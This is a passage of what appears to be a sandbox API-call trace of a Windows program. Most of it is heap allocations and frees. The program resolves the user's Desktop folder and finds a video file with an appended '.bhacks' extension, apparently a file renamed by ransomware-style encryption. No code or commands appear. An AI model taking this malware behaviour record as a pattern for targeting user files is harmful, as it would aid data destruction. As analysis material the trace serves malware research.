cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.584] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6098 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6098 | out: hHeap=0x2af0000) returned 1 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0103.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0103.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0103.586] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0103.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0103.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0103.586] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0103.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0103.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0103.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0103.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0103.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0103.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0103.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0103.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0103.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0103.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/nYVw1n1XTh2-sApcS7w.mp4.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25362701, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25362701, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2552c345, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cAlternateFileName="NYVW1N~1.BHA")) returned 0x9a3b80 [0103.591] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0103.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, 